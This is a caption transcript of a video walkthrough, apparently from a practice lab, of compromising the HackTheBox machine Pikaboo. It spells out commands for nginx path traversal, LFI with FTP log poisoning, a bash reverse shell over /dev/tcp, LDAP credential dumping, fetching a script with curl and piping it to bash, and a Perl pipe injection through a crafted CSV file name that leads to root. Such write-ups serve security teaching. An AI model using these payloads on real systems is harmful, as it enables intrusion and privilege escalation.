HackTheBox - Pikaboo

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

what's going on youtube this is ipsec and we're doing peekaboo from hack the box and i really like this box because of all the enumeration that you have to do in order to get a low privileged shell on the box first you run nmap and discover the web server is engine x based upon the headers however whenever you create an error message on the website it's an apache error message not nginx so you know engine x is running in some type of reverse proxy configuration looking at gearbuster output you see admin anything returns the same exact thing so it looks like the location header in engine x is misconfigured you try admin dot dot and discover there is patch reversal there which allows you to access server dash status which is an apache thing that will leak some open files most notably the admin underscore staging directory you do the patch reversal to go in there and discover there's an lfi vulnerability however php is configured in order to not let you outside of the var directory but you can access the ftp log through that and chain it together to get code execution um there's a lot more that comes after that that i like about this box but let's just jump in as always we're gonna start off with the nmap so dash sc for default scripts sv enumerate versions oh a output all formats put in the nmap directory and call it peekaboo and then the ip address of 10 10 10 249. this can take some time to run so i've already ran it looking at the results we have just three ports open the first one being ftp on port 21 and is running vs ftpd version three point something and just from doing enough ctfs i know off top my head that there's no real um exploit against recent versions of vsftpd we can do search point and see everything is two dot something we could also test for non-miss login but nmap does that by default so nothing really else to test for ftp the next port is ssh on port 22 and it is telling us it's a debian server then we have http on port 80 and it's telling us it is engine x 1.14.2 um the title of the page is saying peekaboo there's nothing really else there like um cookies or anything so let's just go take a look at the webpage so 10 10 10 249 and we get a page the first thing i'm thinking about right now because i see nginx and this little cat in the top left is some type of tomcat server looking at the page source to see if there's like anything that indicates um like the framework that was used to build it i don't really see anything so it just looks like some weird one page application or a static page uh we have peek-a-boo there's some pages here the poke decks i thought i could hold control when i clicked that it didn't work um actually it doesn't have an open a new tab that's weird but just scrolling down looking at what is on this page i don't see anything too interesting um we can look at the contact form or we can just go to these pages at the top left and we have a slash admin that requires authentication and there's something really weird here it's telling us it's an apache server on this error message 2438 debian and it's localhost 81. so there is probably some type of reverse proxy in play with nginx and x is sitting in front of apache not exactly sure what its purpose is yet but that's all we know we do see this url is going to dot php we have poker api id equals one it just says more information coming soon uh it left off at 12. i'm going to try like 13. still more information coming soon uh let's put text in to see if we get an error message this is always saying coming soon so i'm not exactly sure what this feature is yet um let's just do this contact form root ipsec dot rocks message please subscribe to ripsack and then let's send this over to burp suite intercept is on and we're not getting anything um i'm going to open up my console tab see if there's any like weird javascript errors uh this is contact.php so just refresh the page for something but i want to open this and just went back to the page uh let's look at the network tab when we send this nothing we can look at inspector look at this code and it is literally just a button not really doing anything so um yeah that's weird let's just run a go buster so we always have some type of recon going in the background and i should have did this right at the start because we just lost a few minutes of time where we could have been running this so you hdp 10 10 10 uh 249 dash x for extensions php because we did see the php extension uh word list opt sec list um discovery web content raft small words dot text and we probably should say an out file so oh gobuster.out and one of the cool things this out file allows us to do uh we can turn the intercept off um is view results live like this and also grep for them so if we wanted to hide anything that starts with a slash dot because it looks like everything that starts with period goes to a 403 we can easily do that with grep v and then a carrot and then we'll do slash and then escape period because that's also a special character and now we have gobuster hiding all of that output and we can run it a few times to see when new pages come we have admin.php it gets us a access denied so if i try to access admin.php we get forbidden let's see we have slash admin administrator administrator.php admin cp and it looks like everything with admin is getting matched to something and going to a 401 which is asking for authentication but we can validate that by doing a bunch of stuff after admin and we still have authentication required and i'm thinking of a old attack in engine x now um if you do like engine x how it does the um forwarding you do location slash what it begins with and if you do this it's going to match anything that begins with slash admin and that's probably why we're seeing all of this if you want to protect a directory you should always trail uh put a trailing slash here otherwise you may be open to this vulnerability which allows us to do an lfi to the um i think apache server or maybe the nginx server uh i think it's apache but because this it's matching this and if i do like this i'm now i'm in ver dub dub dub html and we can try accessing things like server status is a common page so we can try that so admin dot dot slash server dash status and we have the apache server stats so this allows us to see various pages you can see like when a page is hanging or something or um taking high memory but for us it is leaking some locations so we have this admin staging directory so if i just go to 10 10 10 249 slash admin staging it's asking for authentication but if i put the admin dot dot slash we can now access this directory so this is looking interesting um i'm going to do index.php to see if this is indeed a php server it is so let's run a second go buster whoops wrong pane let's do go buster dir uh dash u http i already had http in the clipboard so we don't have to do that twice x php again uh dash w4 list up set list discovery web content raft small words dot text and dash o we'll call this admin staging dot out also tell us it is go buster so now we're running it on this directory just clicking around let's see edit task can we do that remove looks like this is a pretty dead application we have user.php we have a potential username so we could try to do some brute forcing with ftp or ssh right there table list it's got this page thing we can try um testing for lfi one of the ways i like doing lfi is just testing a php filter real quick so php filter it's convert dot base64 dash encode resource is equal to the file name and we get a bunch of php so we do have some type of um lfi here so echo dash n paste this base64-d invalid input let's see we can go view source and copy it this way i may have copy like that slash div or something echo dash n base64-d and what i'm looking for here is like a database file normally there's like require config.php or db.php somewhere or maybe an include statement so looking at this i don't really see anything what i'm going to do is just search for php tags first uh did that break my tmux my tmux is not responding file open tab dmox i have no idea what just happened there so i'm going to pause the video and fix up tmux okay i'm back i had to do a p kill dash 9 on t max which involved restarting the vpn so i decided i just want to do that off of recording so let's copy this base64 command again and this time i'm going to save it to a file and use grep because apparently t-monks did not like whatever search i did that was a weird issue that surprised i haven't encountered before uh let's see base64-d to index.php and let's make der source and copy that file into the source and let's see i'm going to search for like require uh file get contents not there include we have include a few times and we can see it's including get page else dashboard.php so let's see this admin staging this is dashboard.php and since it's doing an include on page we probably have some type of lfi uh let's try getting like etsy passwd so etsy passwd uh we don't need to view source it's easier to see if it worked because the page will appear here let's see that's ver www.html so maybe we're one directory to hi no let's do this so this is weird there's no filters on that like we saw it's literally if is set include but we can't get etsy past wd um what i'm going to do is just try uh vard let's see it's ver www.html we're probably in admin staging uh index.php does that exist it does not or maybe we are going through burp suite no oh we hung let's try slash dashboard.php and we can pull the page so we know lfi works we just couldn't get to the etsy directory i'm guessing there's some php hearning applied to this server but normally when i have this type of lfi the good way to find out how to weaponize it um is to do another go buster so let's do uh let's see cd opt set list find dot grep dash i lfi and we can use this graceful security linux list if i just less it we can look at it and we got a lot of things via log and just a lot of files in general so this is a good word list to use once you have a lfi and if we had go busted this whole thing um we'd probably find info.php i was running gearbuster here but remember my t-mux crashed which did crash go buster and caused all sorts of issues and i thought it was info.php let's turn burp suite off admin staging not exactly sure but let's just use this word list so i'm going to copy this and we can do w fuzz dash u http 101010 249 admin admin staging and then we want what is it where is it i think page equals let's go back a few times i can just copy this and we'll put fuzz right there w for word list opt cyclist then fuzzing lfi lfi graceful security linux.text and it should be running can i no longer ping the server ping 10 10 10 249 uh so i think my vpn like i think i'm still having issues from when tmux crashed and vpn was probably just running in the background let's check info.php real quick okay yeah that was it so let's see this tells you like the php hurting and we can see open baster is set to ver which means we won't be able to use php to get anything that is not in the verb directory so that's why passwd failed um but a w fuzz should work now and i'm going to hide characters 15 349 and we're just gonna see what payloads are here which means we have fail log vsftpd w temp last log vs ftpd is good because we should be able to write directly to this log we can look at its contents by just doing um this where is it let's go back so var log v vsftpd.log so we can see the contents we have a username where is it that's quit um oh user anonymous so this may have been like my nmap testing anonymous login but the key thing here is we can put anything into this because ftp is open to us so we can put a php shell here and because it is included i forget exactly where that was if we less index.php um let's see because it is included it's going to execute anything in php tags so i'm going to create a php one liner so we want php system then bash dash c bash dash i uh we can do wait yeah bash dash c and then put the single quotes there bash dash i dev tcp 10 10 14 8 9 000 1 0 at and 1 like that and i think this will execute so what i'm going to do is test this out first so we can do nc lvmp 9001 and php dash a to get into interactive mode i forget exactly what the a stands for however we can just run a single php command and we get the reverse shell which is good so we know this command works always try testing things out before you throw them so what i'm going to do is stand up my listener then we ftp 10 10 10 249 log in with our php shell password doesn't really matter because we just want to create that log entry and now when i refresh this page we have a shell as dub dub dub data i'm going to do python 3 dash c import pty pty dot spawn bend bash control z to background sdty raw minus echo then semicolon fg and enter twice and now we have a reverse shell here where we can tab autocomplete so the first thing i want to look at is we can go into admin is there like a dot ht htaccess no cat.ht access not there find.grep ht i'm trying to find out what that password is when you try to go to like 10 10 10 2 49 admin um trying to find out exactly what this password is because we're on show on the box we should be able to find that um i'm going to try checking admin.php what is admin.php fine dot grap admin php i don't see it anywhere um i'm just gonna go to etsy engine x and let's check sites enabled uh cat default and we can see the pages so this admin it does have what i suspected there's no trailing slash here artwork does have a trailing slash it's going to slash opt poke api so it looks like maybe there's a python application running here and then 81 we have pokedex i don't see exactly how it's saying that password though ver www.html let's check admin let's look at index.php [Music] see if there's anything here not exactly sure see let's do export term is equal to x term this is composer let's see fine let's just grab grab dash i password uh we need to specify r for recursive v star.js that did not work we don't really want any of these assets so what if i just put a star here nope nothing so there's nothing password in these php files let's look at user.php and this isn't straight php which is slightly annoying of looking at let's see grep php user there's no php tags in user at all so i'm thinking this admin thing is a dead end even if we can't figure out exactly why it's asking us for authentication actually oh it's probably apache i could was looking at like i think i was looking at engine x logs right i never looked at the apache of this see virtual host 81 here we go um this is it um the reverse proxy confused me for a second because i was like looking at engine x like no it's forwarding it to apache and there's nothing here that says there's a password but i forgot to check the apache logs so we can look at this and we do have a credential here so let's see v creds dot text uh let's move this to hashes and just realize the um kraken server is powered off right now so i won't be able to crack this quickly so let's just move on because i don't want to do it on my host machine because it would slow down the video i don't think we need to but this was just enumeration i would have done on this box if we went back to the engine x it did point us at opt poke api and if we look at let's see find dot dash name star dot pi is it dash name equals i always screw up find syntax find dot graph star.pi wait what find dot grab pi i don't know why that's breaking grab anything that ends in py okay here's all the python files we do have this config directory and there is a settings so let's try config settings and look at this it is django which is a python um framework it's using redis there and we also have ldap so here is the actual um i forget exactly what it's called in old app but the queer uh query where user is so it's like a domain like peekaboo.hdb and it's using this password to log in so let us grab this so i'm going to grep find user on settings.pi and we'll do dash a1 for after one to get both user and password so i'm going to exit this and let's just change it up a little bit vnotes.txt let's copy these two lines and just paste them here okay so we can do ldap search and then what do we do here is it dash capital d i think for a binding with a distinguished name which is just a fancy way of saying this string so we can do this and then we need dash w for the password i know the ldap search syntax is super weird like this and it looks like we authenticate if we do something wrong let's see we get invalid credentials so we have successfully authenticated we can do dash s base naming context and this will probably give us peek-a-boo hdb it gives us dc equals htb so we can say the base is dc equals htb and we have started dumping the whole ldap if you want to know more about this just probably search ldap search on ipsec.rocks where i do it much more so we have this admin dn and user password is this base64. let's echo dash n base64-d and that looks like it is hashed so we don't have that let us do see i thought i saw another one here this check out this user password acura dash n base64-d and we get a password for power and so is there anything else here we have this this is a bind user so this is the password we had been using yep that is the password we already knew so still right now parent meows is the interesting one so let's try doing a su-phone meow logging in and we get authentication failure let's try s8 pound meow at 10 10 10 2 49 and let's see we still can't log into the box so testing the um clipboard we have the correct thing so it's not that there was a second thing so we can do ftp uh 10 10 10 249 because this was also another login parent meow paste in the password and we have authentication successful and looking at this we have a lot of text so i'm going to do a search on ability underscore change log underscore pros because this looks um unique so find slash dash name paste that to devnl and this is in slash sov ftp so there's probably something here with this ftp server but really not sure uh let's run linum real quick so cp opt will make dirt dub dub dub and cp opt was it privilege escalation script awesome sweet and then lynn p's and linps.sh copy it here python3 dash m http server and then we can curl 10 10 14 8 port eight thousand lynn ps.sh pipe it over to bash and we'll see exactly what lynn p's tells us so i'm gonna pause the video it'll probably take 30 seconds to run so right away lynn pease is telling us the htpasswd but it's not really too interesting to us so let's search for linps.sh so we go to the very top of the script and work our way down this i'm just looking for things that are highlighted right now this beginning stuff isn't really too interesting it is detecting it is a vm available software to us here's processes crons timers and service this is always interesting to look at so we have a reverse shell there there's engine x nothing too interesting credentials in memory cron jobs so cron d that's standard con daily that looks all normal hourly weekly uh we have a file that is running every minute this csv update.cron so that is probably interesting we should go through everything else just do a due diligence looking at the timers these are all standard looking through the rest of this output the listening ports we can see ldap is there 81 is that apache nothing too interesting here log in now no one's logged in we can see the last time per meow had logged into the server so we could also use like the find command and look for files edited around may 10th and that may show us something to see exactly what ponemi i was doing on the box that time uh php exec extensions this is all just standard we have permit root login allowed in ssh nothing interesting there still nothing really interesting interesting files uh these are all looks like standard these are set uid binaries and set gid binaries incrontab this is an unknown one this is like a cron but can execute upon file being modified which is really cool so it's essentially crontab we can look at incron at the end of this video if you want and nothing really there so the key thing i don't know what key i just hit but it popped up a terminal um the key thing is this user local bin csv update cron file so let's cat that and we can see all this is doing is going into this directory taking every file execute against csv update with this base name command which i'm guessing is a bash binary yep so it's doing base name and this probably just gets you the base name of something so if i do base name serve ftp versions it's probably just going to give me versions would be my guess yep so that's what that's doing so let's go back to cat this so it's doing base name and then matching everything and csv and then doing a rmrf on this srv ftp so let's look at csv update so vim csv update we don't have them we have vi though and this is a perl script what i'm going to do real quick though is let's copy this over to our machine because we have syntax highlighting and syntax highlighting is definitely nice so i'm going to do nc lvmp 9001 and we can cat user local bin csv update 2 dev tcp 10 10 14 8 9001 and we should also direct this to a file so csv update dot pl send it and now if i vim csv update.pl that looks much better so it's going into this csv directory bunch of files uh not files just like variables so if arg v is less than one then die and print out the usage now we set our v to type it's going into csv directory and type.csv unable to open and it's doing a for loop and i'm guessing this is going to be the file name because that's probably argv so i think this is parsing everything in eric v is my guess and arg v is passed to be file names and this is pearl which this vulnerability is really hard to spot uh the only reason i really knew of it is because of an old talk that i've watched a hundred times just because it is entertaining i know i've linked it somewhere in a video i forget what one if you search for pearl jam and then click on pearl jam not the band there is two talks by this guy they are both amazing so definitely go to explain the 20 year old vulnerability and then pearl jam two but essentially how it boils down to is pearl when you um loop through this it doesn't accept strings unless that string is arg v which i think in this case it is but also um it just wraps around an open command and open on a file stream and for some reason in perl if you open and it begins or ends with a pipe it executes it instead not sure exactly why but that's what that talk is about it is the second one pearl jam 2 so when this part confuses you as it probably should because this is such a weird thing go reference that talk so all we have to do is upload a csv file that begins with a pipe and execute something so i'm going to go into a new directory so makeder ftp and then let us echo um bash dash c bash dash i actually we don't need this because we're gonna put it in base 64. so bash dash i dev tcp 10 10 14 8 9 000 1 0 and 1. i'm going to put it in single quotes and not double quotes in case anything's a special character i don't want it interpreted and we can base64 w0 and one thing i generally like doing it's not required in this case but i try to get rid of any special character in base64 when i can so that equal sign is at the end so if i put a space here that goes away but i also want to get rid of this plus and i'm guessing the plus is either in one of these two spots or actually three so i'm going to put a space before the i and that did get rid of it however we now have padding on the end there is two there if i get rid of that space it's now a plus here so again let's add three here oh we don't have to add three there because the plus is happening before the end of the string so i'm guessing that's happening where this zero direct one is there we go and then we have a padding of two with these equals and here we go that probably overcomplicated it but you can play around with base64 if you do it enough eventually um you kind of eyeball it and figure out what to do to make it pure alphanumeric and we can look at it still looks like it should work so now we have to touch a file name so i'm going to touch and then echo this base64-d and then pipe it over to bash and it also has to end with csv so i'm just going to do a semicolon csv and for this touch command to work we probably want to do two dashes to begin with so it doesn't interpret anything as like an argument so now if i do ls here we have this super weird file name and we can also test out the payload by just executing this piece so if i paste that in we do nclvmp 9001 echo this boom that does work so the next step is to get into this ftp directory i'm gonna do lcd ftp and what lcd means is local change directory so when i ran ftp i was in this directory i wanted to move into the ftp directory because that's where i put this weird shell so i went into the directory and then the easiest way to put this on the server is just using mput and we can use a wildcard now we don't want to start the shell up right now because the weird thing is it's actually going to execute this uh what input echo like that not connected it's weird let's just go in the ftp directory uh ftp 10 10 10 249 it's pawn meow and the password began with underscore g forgot to catch them all and shoot um i lost the command but we can just grab it so home per meow right here echo dash m gotta catch them all so we logged in successfully uh we want to go into the versions directory because that's where the cron actually changed directory into if i cat etsy cron tab cat user local bin csv update cron let's see i want to say it went into version somewhere use a local bin csv update or maybe versions where we can write but let's try doing that input to command again we can just input echo star let's see there we go i guess i should not have put it in quotes so if i try putting this here we can see it does execute it oddly enough but it uploads it if i do a date command here we can see we have another nine seconds till a new minute and it runs it every minute so hopefully at 1603 we get a shell and it doesn't look like we did oh there we go there's the shell so here we are we are now root on peekaboo so there was something i wanted to talk about in this video i forget exactly what it was right at the start of the video i said we can look at it and post root and then i forgot all about what i said so um i guess that's going to be the video hope you guys enjoyed it take care and i will see you all next week

Info

Channel: IppSec

Views: 13,585

Rating: undefined out of 5

Keywords:

Id: 4tXFHoeOytE

Channel Id: undefined

Length: 42min 26sec (2546 seconds)

Published: Sat Dec 04 2021